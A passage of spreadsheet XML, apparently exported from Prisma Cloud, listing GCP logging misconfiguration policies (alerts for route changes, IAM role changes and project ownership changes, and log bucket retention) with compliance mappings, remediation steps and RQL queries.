          <t>true</t>
        </is>
      </c>
      <c r="AK2927" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2928">
      <c r="A2928" t="inlineStr">
        <is>
          <t>Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (GCP) Level 2, Telecommunications Security Act - TSA, Risk Management in Technology (RMiT), NIST 800-53 Rev 5, Telecommunications Security Act - TSA, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, GDPR, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, ITSG-33, CIS v1.3.0 (GCP), Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Telecommunications Security Act - TSA, CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Risk Management in Technology (RMiT), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, HIPAA, Microsoft Cloud Security Benchmark v1, CIS v3.0.0 (GCP) Level 2, Secure Controls Framework (SCF) - 2024.2, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, DORA, ISO/IEC 27001:2022, TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B2928" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2928" s="2" t="inlineStr"/>
      <c r="D2928" t="inlineStr"/>
      <c r="E2928" t="inlineStr"/>
      <c r="F2928" t="inlineStr"/>
      <c r="G2928" t="b">
        <v>1</v>
      </c>
      <c r="H29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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2928" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2928" t="inlineStr">
        <is>
          <t>GCP Log metric filter and alert does not exist for VPC network route delete and insert</t>
        </is>
      </c>
      <c r="L2928" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2928" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2928" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2928" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2928" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2928" t="inlineStr">
        <is>
          <t>AU</t>
        </is>
      </c>
      <c r="R2928" t="inlineStr">
        <is>
          <t>AU-09-00 : Protection of Audit Information</t>
        </is>
      </c>
      <c r="S2928" t="inlineStr"/>
      <c r="T2928" t="b">
        <v>0</v>
      </c>
      <c r="U2928" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2928" t="inlineStr">
        <is>
          <t>gcloud-logging-metric</t>
        </is>
      </c>
      <c r="W2928" t="inlineStr">
        <is>
          <t>This policy identifies GCP accounts which do not have a log metric filter and alert for VPC network route delete and insert events. Monitoring network routes deletion and insertion activities will help in identifying VPC traffic flows through an expected path. It is recommended to create a metric filter and alarm to detect activities related to the deletion and insertion of VPC network routes.</t>
        </is>
      </c>
      <c r="X2928" t="inlineStr">
        <is>
          <t>1. Sign in to GCP Console
2. Navigate to 'Logs-based metrics' under the 'Logging' section.
3. Click on 'CREATE METRIC'.
4. Provide 'Metric Type' and 'Details'.
5. In 'Filter selection', add filter as 
resource.type="gce_route" AND (protoPayload.methodName:"compute.routes.delete" OR protoPayload.methodName:"compute.routes.insert")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8" t="inlineStr"/>
      <c r="Z2928" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-metric' as X; config from cloud.resource where api.name = 'gcloud-monitoring-policies-list' as Y; filter '$.Y.conditions[*].metricThresholdFilter contains $.X.name and ( $.X.filter contains "resource.type =" or $.X.filter contains "resource.type=" ) and ( $.X.filter does not contain "resource.type !=" and $.X.filter does not contain "resource.type!=" ) and $.X.filter contains "gce_route" and ( $.X.filter contains "protoPayload.methodName:" or $.X.filter contains "protoPayload.methodName :" ) and ( $.X.filter does not contain "protoPayload.methodName!:" and $.X.filter does not contain "protoPayload.methodName !:" ) and $.X.filter contains "compute.routes.delete" and $.X.filter contains "compute.routes.insert"'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2928" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2928" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2928" t="inlineStr">
        <is>
          <t>PC-GCP-MON-938</t>
        </is>
      </c>
      <c r="AD2928" t="b">
        <v>1</v>
      </c>
      <c r="AE2928" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2928" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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8" t="inlineStr">
        <is>
          <t>adee3240-2355-4a24-821e-d54141f008b2</t>
        </is>
      </c>
      <c r="AI2928" t="inlineStr">
        <is>
          <t>725d2575-428a-4ad3-9a93-74da16753b26</t>
        </is>
      </c>
      <c r="AJ2928" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2928" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2929">
      <c r="A2929" t="inlineStr">
        <is>
          <t>CIS v1.3.0 (GCP), jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Telecommunications Security Act - TSA, Fedramp (Moderate), Risk Management in Technology (RMiT), CSA CCM v.4.0.6, Australian Energy Sector Cyber Security Framework (AESCSF), PCI DSS v3.2.1, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ISO/IEC 27002:2013, ISO/IEC 27017:2015, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CSA CCM v4.0.12, TX-RAMP Level 2, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), CIS v1.1.0 (GCP), ISO/IEC 27002:2013, CIS Controls v8.1, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, NIST 800-53 Rev 5, CIS v2.0.0 (GCP) Level 1, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, TX-RAMP Level 1, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev4, ISO/IEC 27002:2013, CIS Controls v8.1, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Fedramp (Low), NIST SP 800-171 Revision 3, ISO/IEC 27017:2015, Fedramp (Low), Rehan, CIS v1.2.0 (GCP), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v4.0, NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Risk Management in Technology (RMiT), PCI DSS v4.0,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- 2024.2, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, NIST CSF, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CIS v3.0.0 (GCP) Level 1, Fedramp (Moderate), NIST CSF, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, CIS Controls v8.1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CSA CCM v4.0.12, ISO/IEC 27001:2022, Matt's ATT&amp;ACK, NIST 800-53 Rev 5, ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, PCI DSS v4.0, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, ISO/IEC 27018:2019, NIST CSF, CIS v1.0.0 (GCP), CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2929" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2929" s="2" t="inlineStr"/>
      <c r="D2929" t="inlineStr"/>
      <c r="E2929" t="inlineStr"/>
      <c r="F2929" t="inlineStr"/>
      <c r="G2929" t="b">
        <v>0</v>
      </c>
      <c r="H29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29" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2929" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2929" t="inlineStr">
        <is>
          <t>GCP Log metric filter and alert does not exist for IAM custom role changes</t>
        </is>
      </c>
      <c r="L2929" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2929" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2929" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2929" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2929" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2929" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2929" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2929" t="inlineStr"/>
      <c r="T2929" t="b">
        <v>0</v>
      </c>
      <c r="U2929" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2929" t="inlineStr">
        <is>
          <t>gcloud-logging-metric</t>
        </is>
      </c>
      <c r="W2929" t="inlineStr">
        <is>
          <t>This policy identifies the GCP account which does not have a log metric filter and alert for IAM custom role changes. Monitoring role creation, deletion and updating activities will help in identifying over-privileged roles at early stages. It is recommended to create a metric filter and alarm to detect activities related to the creation, deletion and updating of custom IAM Roles.</t>
        </is>
      </c>
      <c r="X2929" t="inlineStr">
        <is>
          <t>1. Sign in to GCP Console
2. Navigate to 'Logs-based metrics' under the 'Logging' section.
3. Click on 'CREATE METRIC'.
4. Provide 'Metric Type' and 'Details'.
5. In 'Filter selection', add filter as 
resource.type="iam_role" AND protoPayload.methodName = "google.iam.admin.v1.CreateRole" OR protoPayload.methodName="google.iam.admin.v1.DeleteRole" OR protoPayload.methodName="google.iam.admin.v1.UpdateRole"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29" t="inlineStr"/>
      <c r="Z2929" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-metric' as X; config from cloud.resource where api.name = 'gcloud-monitoring-policies-list' as Y; filter '($.Y.conditions[*].metricThresholdFilter contains $.X.name) and ($.X.filter contains "resource.type =" or $.X.filter contains "resource.type=") and ($.X.filter does not contain "resource.type !=" and $.X.filter does not contain "resource.type!=") and $.X.filter contains "iam_role" and ($.X.filter contains "protoPayload.methodName=" or $.X.filter contains "protoPayload.methodName =") and ($.X.filter does not contain "protoPayload.methodName!=" and $.X.filter does not contain "protoPayload.methodName !=") and $.X.filter contains "google.iam.admin.v1.CreateRole" and $.X.filter contains "google.iam.admin.v1.DeleteRole" and $.X.filter contains "google.iam.admin.v1.UpdateRole"'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2929" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2929" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2929" t="inlineStr">
        <is>
          <t>PC-GCP-MON-516</t>
        </is>
      </c>
      <c r="AD2929" t="b">
        <v>1</v>
      </c>
      <c r="AE2929" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2929" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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29" t="inlineStr">
        <is>
          <t>b289b0e7-9166-410b-83b4-890f685d45d6</t>
        </is>
      </c>
      <c r="AI2929" t="inlineStr">
        <is>
          <t>a8fde061-f52d-48c8-a084-447f769a9d98</t>
        </is>
      </c>
      <c r="AJ2929" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2929" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2930">
      <c r="A2930" t="inlineStr">
        <is>
          <t>jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CIS v1.2.0 (GCP), MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Fedramp (Moderate), Risk Management in Technology (RMiT), CSA CCM v.4.0.6, PCI DSS v4.0, Australian Energy Sector Cyber Security Framework (AESCSF), Microsoft Cloud Security Benchmark v1, PCI DSS v3.2.1, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ISO/IEC 27002:2013, ISO/IEC 27017:2015, ITSG-33, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, CRI Profile v1.2.1, CIS v1.1.0 (GCP), CSA CCM v4.0.12, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, TX-RAMP Level 1, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, CIS v3.0.0 (GCP) Level 1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev4, ISO/IEC 27002:2013, CIS Controls v8.1, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, Fedramp (Low), NIST SP 800-171 Revision 3, CIS v1.0.0 (GCP), ISO/IEC 27017:2015, Fedramp (Low), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), HITRUST CSF v.11.2.0, CIS v1.3.0 (GCP), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Risk Management in Technology (RMiT), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, PCI DSS v4.0, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, NIST CSF, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Fedramp (Moderate), NIST CSF, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, Rehan, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CSA CCM v4.0.12, CSA CCM v4.0.12, PCI DSS v4.0, CIS v2.0.0 (GCP) Level 1, Matt's ATT&amp;ACK, ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2930" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2930" s="2" t="inlineStr"/>
      <c r="D2930" t="inlineStr"/>
      <c r="E2930" t="inlineStr"/>
      <c r="F2930" t="inlineStr"/>
      <c r="G2930" t="b">
        <v>0</v>
      </c>
      <c r="H29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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2930" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2930" t="inlineStr">
        <is>
          <t>GCP Log metric filter and alert does not exist for Project Ownership assignments/changes</t>
        </is>
      </c>
      <c r="L2930" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2930" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2930" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2930" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2930" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2930" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2930" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2930" t="inlineStr"/>
      <c r="T2930" t="b">
        <v>0</v>
      </c>
      <c r="U2930" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2930" t="inlineStr">
        <is>
          <t>gcloud-logging-metric</t>
        </is>
      </c>
      <c r="W2930" t="inlineStr">
        <is>
          <t>This policy identifies the GCP account which does not have a log metric filter and alert for Project Ownership assignments/changes. Project Ownership Having highest level of privileges on a project, to avoid misuse of project resources project ownership assignment/change actions mentioned should be monitored and alerted to concerned recipients.</t>
        </is>
      </c>
      <c r="X2930" t="inlineStr">
        <is>
          <t>1. Sign in to GCP Console
2. Navigate to 'Logs-based metrics' under the 'Logging' section.
3. Click on 'CREATE METRIC'.
4. Provide 'Metric Type' and 'Details'.
5. In 'Filter selection', add filter as 
(protoPayload.serviceName="cloudresourcemanager.googleapis.com") AND (ProjectOwnership OR projectOwnerInvitee) OR (protoPayload.serviceData.policyDelta.bindingDeltas.action="REMOVE" AND protoPayload.serviceData.policyDelta.bindingDeltas.role="roles/owner") OR (protoPayload.serviceData.policyDelta.bindingDeltas.action="ADD" AND protoPayload.serviceData.policyDelta.bindingDeltas.role="roles/owner")
6. Click on 'CREATE METRIC'.
7. Under 'User-defined metrics' section, choose the metric you created in step 6 and click on the kebab menu (Vertical 3 dots) on the right side of the metrics
8. Click on 'Create alert from metric'; it will navigate to 'Create alerting policy' under the section 'Monitoring'.
9. Add the metric name created above if not auto-filled in the Monitoring filter. Choose an appropriate value for other alert condition parameters as desired. Then Click on 'NEXT'
10. Configure all alert trigger settings as desired. Then Click on 'NEXT'
11. Configure notifications as desired and provide an appropriate name for the alert policy. Then Click on 'NEXT'
12. Click on 'CREATE POLICY'.</t>
        </is>
      </c>
      <c r="Y2930" t="inlineStr"/>
      <c r="Z2930" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-metric' as X; config from cloud.resource where api.name = 'gcloud-monitoring-policies-list' as Y; filter '($.Y.conditions[*].metricThresholdFilter contains $.X.name) and ($.X.filter contains "protoPayload.serviceName=" or $.X.filter contains "protoPayload.serviceName =") and ($.X.filter does not contain "protoPayload.serviceName !=" and $.X.filter does not contain "protoPayload.serviceName!=") and $.X.filter contains "cloudresourcemanager.googleapis.com" and ($.X.filter contains "ProjectOwnership OR projectOwnerInvitee" or $.X.filter contains "ProjectOwnership or projectOwnerInvitee") and ($.X.filter contains "protoPayload.serviceData.policyDelta.bindingDeltas.action=" or $.X.filter contains "protoPayload.serviceData.policyDelta.bindingDeltas.action =") and ($.X.filter does not contain "protoPayload.serviceData.policyDelta.bindingDeltas.action!=" and $.X.filter does not contain "protoPayload.serviceData.policyDelta.bindingDeltas.action !=") and ($.X.filter contains "protoPayload.serviceData.policyDelta.bindingDeltas.role=" or $.X.filter contains "protoPayload.serviceData.policyDelta.bindingDeltas.role =") and ($.X.filter does not contain "protoPayload.serviceData.policyDelta.bindingDeltas.role!=" and $.X.filter does not contain "protoPayload.serviceData.policyDelta.bindingDeltas.role !=") and $.X.filter contains "REMOVE" and $.X.filter contains "ADD" and $.X.filter contains "roles/owner"'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2930" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2930" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2930" t="inlineStr">
        <is>
          <t>PC-GCP-MON-525</t>
        </is>
      </c>
      <c r="AD2930" t="b">
        <v>1</v>
      </c>
      <c r="AE2930" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2930" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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0" t="inlineStr">
        <is>
          <t>449fc734-3298-4746-ad5f-4686c9027011</t>
        </is>
      </c>
      <c r="AI2930" t="inlineStr">
        <is>
          <t>df102802-339d-4d50-9d84-7c601c09f892</t>
        </is>
      </c>
      <c r="AJ2930" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2930" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2931">
      <c r="A2931" t="inlineStr">
        <is>
          <t>CIS Controls v7.1, Sarbanes Oxley Act (SOX), CRI Profile v1.2.1, kashan ACSC Information Security Manual (ISM), Telecommunications Security Act - TSA, ISO 27002:2022, ISO/IEC 27001:2022, Risk Management in Technology (RMiT), NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, ACSC Information Security Manual (ISM), CSA CCM v4.0.12, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CSA CCM v.4.0.6, CSA CCM v4.0.12, CIS Controls v8, PCI DSS v4.0, Copy of New Zealand Information Security Manual (NZISM v3.4), Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, DORA, Risk Management in Technology (RMiT), Secure Controls Framework (SCF) - 2022.2.1, Copy of CIS Controls v8, RBI Baseline Cyber Security and Resilience Requirements, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2024.2, Risk Management in Technology (RMiT), New Zealand Information Security Manual (NZISM v3.4), Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, NIST SP 800-171 Revision 3</t>
        </is>
      </c>
      <c r="B2931" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2931" s="2" t="inlineStr"/>
      <c r="D2931" t="inlineStr"/>
      <c r="E2931" t="inlineStr"/>
      <c r="F2931" t="inlineStr"/>
      <c r="G2931" t="b">
        <v>1</v>
      </c>
      <c r="H29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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2931" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2931" t="inlineStr">
        <is>
          <t>GCP Log bucket retention policy not enabled</t>
        </is>
      </c>
      <c r="L2931" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2931" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2931" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2931" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2931" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2931" t="inlineStr">
        <is>
          <t>CIS Control 3</t>
        </is>
      </c>
      <c r="R2931" t="inlineStr">
        <is>
          <t>3.4</t>
        </is>
      </c>
      <c r="S2931" t="inlineStr"/>
      <c r="T2931" t="b">
        <v>0</v>
      </c>
      <c r="U2931" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2931" t="inlineStr">
        <is>
          <t>gcloud-logging-sinks-list</t>
        </is>
      </c>
      <c r="W2931" t="inlineStr">
        <is>
          <t>This policy identifies GCP log buckets for which retention policy is not enabled. Enabling retention policies on log buckets will protect logs stored in cloud storage buckets from being overwritten or accidentally deleted. It is recommended to configure a data retention policy for these cloud storage buckets to store the activity logs for forensics and security investigations.</t>
        </is>
      </c>
      <c r="X2931" t="inlineStr">
        <is>
          <t>1. Log in to google cloud console 
2. Navigate to section 'Browser', Under 'Storage' 
3. Select the alerted log bucket
4. In tab ''RETENTION', click on '+SET RETENTION POLICY' to set a retention policy
5. Set a value for 'Retention period' in pop-up 'Set a retention policy'
6. Click on 'SAVE'.</t>
        </is>
      </c>
      <c r="Y2931" t="inlineStr"/>
      <c r="Z2931" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-sinks-list' AND json.rule = 'destination.bucket exists' as X; config from cloud.resource where api.name = 'gcloud-storage-buckets-list' AND json.rule = (retentionPolicy does not exist ) as Y; filter '($.X.destination.bucket contains $.Y.name)'; show Y;</t>
        </is>
      </c>
      <c r="AA2931" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
